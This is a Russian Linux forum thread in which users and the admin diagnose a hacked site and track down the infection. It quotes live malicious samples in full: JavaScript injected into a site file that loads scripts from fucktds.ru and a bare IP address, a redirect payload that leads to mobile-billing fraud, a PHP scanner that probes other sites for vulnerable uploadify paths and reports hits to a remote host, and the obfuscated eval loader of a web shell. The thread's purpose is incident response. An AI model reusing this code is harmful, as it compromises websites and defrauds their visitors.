Linux - это интересно!
Вы не вошли.
Всем привет!
Кто-то взломал сайт/форум. При попытке зайти с выключенным NoScript происходит редирект на левый сайт.
Вне форума
Да ладно вам, у меня нет носкрипта ни в одном из трех браузеров: google-chrome, opera, palemoon, и с любого из них спокойно захожу. Может иам стоит почистить кеш браузера?
In Tux We Trust
Вне форума
что google-chrome, что firefox - ситуация та же. Более того:
$ wget -q http://zenway.ru/plg/shjs/sh_main.min.js -O - | grep fucktds.ru
s.src='https://fucktds.ru/pF2qsd?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';
Добавлено спустя 11 мин 15 с:
Проверил вывод команды выше с шведского сервера - вывод команды идентичен.
Добавлено спустя 27 мин 47 с:
redix, получается что sh_main.min.js закеширован у вас в браузере А в сам файл в конце дописали каким-то способом заразу:
$ curl -s http://zenway.ru/plg/shjs/sh_main.min.js | tail -n 7
var d=document;var s=d.createElement('script');
s.src='https://fucktds.ru/pF2qsd?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Так что надо чинить.
Отредактировано ZEN (04-06-2017 14:05:10)
Вне форума
нормально заходит, мидори даже для этого поставил
Долой DE! Даёшь WM!
Вне форума
Привет Биг, при заходе оперой один раз промелькнула какая то страница, единственное что успел увидеть, так это довольно крупный готический шрифт, какого то зеленоватого цвета. Повторить фокус не получилось. Вот здесь говорят, что на этом ай-пи никаких других сайтов не присутствует.
In Tux We Trust
Вне форума
Я знаю, почему у вас нет редиректа.
1. Грузится страница.
2. Подгружается и выполняется javascript код из файла http://zenway.ru/plg/shjs/sh_main.min.js и получаем в HTML вот такое:
<script src="https://fucktds.ru/pF2qsd?frm=script&&pid=5741&se_referrer=http%3A%2F%2Fzenway.ru%2Fforum%2Findex.php&default_keyword=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC%D0%B0%D0%BB%D0%B8%20%D1%81%D0%B0%D0%B9%D1%82%20%2F%20%D0%9A%D1%83%D1%80%D0%B8%D0%BB%D0%BA%D0%B0%20%2F%20Zenway"></script>
И если пойти по сгенерированной ссылки - есть риск получить javascript код, который сделает редирект. А есть риск получить то, что я вижу сейчас - 501 HTTP код с текстом "Sorry. Please visit us again later.". То есть, из-за перегруженного сервера вы не видите редиректа.
Хочу повторно обратить внимание, что скрипт для подгрузки кода с домена fucktds.ru сам по себе выглядит странным. А то, что удалось словить редирект не должно вызывать сомнений в выпиливании этой заразы.
Вне форума
У меня удаленный сервер опять заработал. Вот, что подгружается с fucktds.ru:
$ wget -q 'https://fucktds.ru/pF2qsd?frm=script&&pid=5742&se_referrer=http%3A%2F%2Fzenway.ru%2F&default_keyword=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC%D0%B0%D0%BB%D0%B8%20%D1%81%D0%B0%D0%B9%D1%82%20%2F%20%D0%9A%D1%83%D1%80%D0%B8%D0%BB%D0%BA%D0%B0%20%2F%20Zenway' -O -; echo
function process() {
window.location = "https://fucktds.ru/gateway.php?frm=dm&token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1cmwiOiJodHRwOlwvXC93YXBtaWsucnVcLz9zdWJfaWQ9NGlxc2I5ZGprY2dzNDVqIn0.AqxoSMXDH29lEorST-lfwme0qH8eB6U7F6xJPv0WHVQ";
}
window.onerror = process;
process();
А теперь подумайте о том, что новых пользователей сайта у вас не будет из-за редиректа. Подумайте, что скоро браузеры начнут метить страницы вашего сайта как опасные. Подумайте, что сегодня подгружается код для редиректа, а завтра будет подгружаться код ворующий логин/пароли из форм для входа на сайт.
Я удивлен и огорчен тем фактом, что вы все еще не исправили это.
Вне форума
Не беспокойтесь вы так, админы тут появляются раз в год по праздникам, но тем не менее спам ботов практически нет. Даже если и не ответили, то это не значит что не видели ваши сообщения, и ничего не делают.
In Tux We Trust
Вне форума
@ZEN, запостите ссылку на скрипт в adblock, ublock и т.п..
@ZEN, запостите ссылку на скрипт в adblock, ublock и т.п..
У меня в AdBlock ручное правило для блокировки
https://fucktds.ru/*
Не беспокойтесь вы так, админы тут появляются раз в год по праздникам, но тем не менее спам ботов практически нет. Даже если и не ответили, то это не значит что не видели ваши сообщения, и ничего не делают.
Это меня и печалит. Когда-то sysadminday.com.ru умирал на глазах, потому что ни у кого не было доступа по ftp и все предложения по изменению сайта звучали в никуда. Теперь sysadminday.com.ru не существует.
Но тут ситуация несколько иная.. К слову, я средствами форума отправил е-мейл админу пару дней назад с рекомендациями что делать (не достаточно удалить заразу, нужно пользовательские браузеры заставить принудительно обновить локальный кеш).
Вне форума
К слову, я средствами форума отправил е-мейл админу
Форумом Vovans занимается, по моему, но он появлялся уже давно, даже не скажу как.
In Tux We Trust
Вне форума
Всем спасибо. Заразу нашёл. Причём, в неожиданном месте. Но как она туда попала - большой вопрос (((
Сейчас очень занят постоянно и нет времени заниматься сайтом. Но посматриваю время - от времени, что с ним, и ежемесячно оплачиваю VDS
Как на зло, ещё отвалилась и почта, что была в контактах. Поправил адрес на актуальный.
Ещё раз спасибо.
Добавлено спустя 04 мин 24 с:
Какие интересные скрипты находятся на сайте:
<?php
error_reporting(0);
ini_set('display_errors',0);
ini_set('max_execution_time',13400);
ini_set('log_errors',0);
ini_set('memory_limit','512M');
ini_set('default_socket_timeout',10);
ignore_user_abort();
function g($v){$p=curl_init();curl_setopt($p,CURLOPT_URL,'http://'.$v);curl_setopt($p,CURLOPT_HEADER,0);curl_setopt($p,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trid
ent/7.0; rv:11.0) like Gecko');curl_setopt($p,CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_1);curl_setopt($p,CURLOPT_RETURNTRANSFER,1);curl_setopt($p,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($p,CURL
OPT_TIMEOUT,10);curl_setopt($p,CURLOPT_FOLLOWLOCATION,1);curl_setopt($p,CURLOPT_MAXREDIRS,1);curl_setopt($p,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($p,CURLOPT_SSL_VERIFYHOST,0);$d=curl_exec($p);
curl_close($p);return $d;}
$l=array('admin/include/uploadify/uploadify.css','admin/js/jquery.uploadify/uploadify.css','assets/modules/evogallery/js/uploadify/uploadify.css','bitrix/modules/defa.tools/install/scripts/upl
oadify/uploadify.css','bitrix/modules/smanline.uploadandunzip/install/tools/smanline.uploadandunzip/uploadify/php/uploadify.css','bitrix/tools/defatools/uploadify/uploadify.css','bitrix/tools/
smanline.uploadandunzip/uploadify/php/uploadify.css','feedback/uploadify/uploadify.css','includes/uploadify/uploadify.css','js/jquery.uploadify/uploadify.css','landing/escalera/admin/upload-up
loadify.css','mod/uploadify.css','mymodules/uploadify/uploadify.css','nanomaxi/upload-uploadify.css','assets/modules/evogallery/js/uploadify/uploadify.css','payment/assets/js/uploadify-v2.1.4/
uploadify.css','plugins/community/uploadify/uploadify.css','protected/modules/pictures/components/uploadify.css','assets/modules/evogallery/js/uploadify/uploadify.css','sites/all/modules/uploa
dify/uploadify/uploadify.css','uploadify/uploadify.css');
if(preg_match('/uploadifyQueueItem/mi',g('leopold24.ru/include/template/t'))){
w:
if(!file_exists(__DIR__.'/s')){$s=g('leopold24.ru/include/template/s.php?g');if(empty($s)){exit();}file_put_contents(__DIR__.'/s',$s);}
$f=file(__DIR__.'/s');
if(!file_exists(__DIR__.'/c')){file_put_contents(__DIR__.'/c','0');}
$c=file_get_contents(__DIR__.'/c');
$g=count($f);
$y=time();
while($g>$c){
$a=trim($f[$c]);
foreach($l as $ll){if(preg_match('/uploadifyQueueItem/mi',g($a.'/'.$ll))){g('leopold24.ru/include/template/s.php?r='.urlencode($a.'/'.$ll));}}
if($c++%100==0){file_put_contents(__DIR__.'/c',$c);if((time()-$y)>13400){exit();}}
}
unlink(__DIR__.'/s');
unlink(__DIR__.'/c');
goto w;
}
zenway admin
Вне форума
@vovans, приветствую. Значит я не ошибся, когда назвал именно вас. )
In Tux We Trust
Вне форума
Всем спасибо. Заразу нашёл. Причём, в неожиданном месте. Но как она туда попала - большой вопрос (((
Сейчас очень занят постоянно и нет времени заниматься сайтом. Но посматриваю время - от времени, что с ним, и ежемесячно оплачиваю VDS
Вариантов много). Если достаточно старая версия Apache, то могли и через юзерагент закачать скрипт из вне. Если логи сохранились, можно поизучать. Если MySQL открыт на внешку, то там тоже была веселая уязвимость позволяющая создать файл с произвольным содержимом и выполнить. Ну или еще проще - уязвимость в FluxBB.
Вне форума
@ZEN, мы с вами нигде не пересекались, кроме как здесь? А то до жути знакомая аватарка, и почему то ассоциируется с Ubuntu, хотя тут я могу и ошибаться.
In Tux We Trust
Вне форума
Проблемный скрипт лежал в плагине основного сайта с 15 года. А внесли его в шаблон форума в конце мая. Ещё был скрипт, что я процитировал. Разбирать некогда, но дата правки и содержание сомнительны и это вообще в другом сайте. Все обновления системы накатываю регулярно. Коне что же, мускул наружу не торчит.
zenway admin
Вне форума
@ZEN, мы с вами нигде не пересекались, кроме как здесь? А то до жути знакомая аватарка, и почему то ассоциируется с Ubuntu, хотя тут я могу и ошибаться.
Я заядлый Debian-щик. В принципе, я посещал и посещаю разные ресурсы по линуксам. Так что не исключено, что за почти 9 лет моя аватарка где-то да попадалась. Но в последнее время я не участвую в дискуссиях и если посещает желание о чем-то написать, то делаю это на своем форуме linuxhub.ru
Вне форума
Понятно, буду знать. )
In Tux We Trust
Вне форума
Интересный кусок скрипта:
var d=document;var s=d.createElement('script');
s.src='http://37.139.50.21/H3td1w?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(docum
ent.title) + '';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Если вы входите через мобильный телефон, вас перекидывает на скрипт
'http://37.139.50.21/gateway.php?bla_bla_bla
откуда перекидывает на:
http://webprotect.space/16d423ebd90605c4/sub1/sub2/sub3/sub4?track_id=3hg83gnd9pj3060uoi
И там на страницу какого-то там под-под домена вашего оператора связи, где вам предлагает какую-то услугу за 30 руб в сутки, кажется, которые будут списываться со счёта вашего телефона.
Но если вы заходите не с мобильного телефона, то ничего даже не замечаете )
zenway admin
Вне форума
А откуда это появилось, таки взломали?
In Tux We Trust
Вне форума
Я не могу пока найти, каким образом подобные дописки появляются в одном из скриптов
Если ещё раз повторится, буду серьёзно копать.
Добавлено спустя 04 мин 06 с:
Причём доп код в js появляется так, что дата редактирования файла не меняется.
zenway admin
Вне форума
я бы поискал упоминание команды eval
$ grep -r eval www/
вполне может быть, что где-то из base64 декодируется PHP код и выполняется дописывая заразу в файл.
По base64_decode не факт, что найдет, так как код может быть обфусцирован. Например:
zen@devel:~$ wget -q "[url]http://www.38stroika.ru/goodshell.php[/url]" -O - | head -n7
<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator: [url]http://www.fopo.com.ar/[/url]
This code was created on Saturday, February 4th, 2017 at 14:39 UTC from IP 105.155.155.94
Checksum: 38ae5f7b17e11cd07827e61580cb96788c08372e
*/
$n8d530ed="\x62\141\x73\145\66\64\x5f\x64\x65\x63\157\144\145";@eval($n8d530ed(
zen@devel:~$ python -c "print '\$n8d530ed=\"\x62\141\x73\145\66\64\x5f\x64\x65\x63\157\144\145\";@eval(\$n8d530ed('"
$n8d530ed="base64_decode";@eval($n8d530ed(
Отредактировано ZEN (23-06-2017 21:44:53)
Вне форума
В общем, после блокировок Телеграмма наш сайт стал недоступен для 50% россиян. У меня он только с телефона работал или через VPN. На работе было всё ок. И у некоторых моих знакомых он открывался без проблем. Какая-то странная блокировка.
Но суета, дела, только сегодня я записал в саппорт, чтобы нам сменили ip. На что саппорт сказал, что не может такого делать. Нужно остановить дроплет, сделать бекап, создать из него новый дроплет и старый удалить. Но они не дают гарантии, что новый ip будет "чист" для РФ. Я проделал эту небыструю процедуру. В первый раз адрес оказался таким, что блокировался даже на работе как ненадёжный ) но со второго раза всё ок.
Что ещё заметил и что порадовало. Это нужно было сделать давно. Теперь не 512Мб RAM, а 1024 ))) и SSD не 20, а 25Гб, что очень кстати, так как 20 уже давно впритык было. Показалось, что сайт стал шевелиться веселее ) даже прям совсем быстро. Может показалось. Но память в два раза увеличилась - это не могло не повлиять. 512Мб - это слишком мало.
Такие вот новости.
Заодно обновил и обкатываю новый движок тут:
нужно когда-нибудь и до основного сайта дойти. Но слишком много возни с переделкой шаблона будет. Так бы уже давно...
zenway admin
Вне форума
А я смотрю что сайт сколько то раз пытался не открываться.
In Tux We Trust
Вне форума
придётся таки переходить на новый движок так или иначе. Сейчас сервер крутится на 14.04, коей поддержка скоро заканчивается (относительно скоро). А новый PHP... он со старыми движками никак. Ну и минимум день-другой сайт работать не будет. Но это когда будет... ))
zenway admin
Вне форума
[ Сгенерировано за 0.020 сек, 11 запросов выполнено - Использовано памяти: 1.74 Мбайт (Пик: 1.81 Мбайт) ]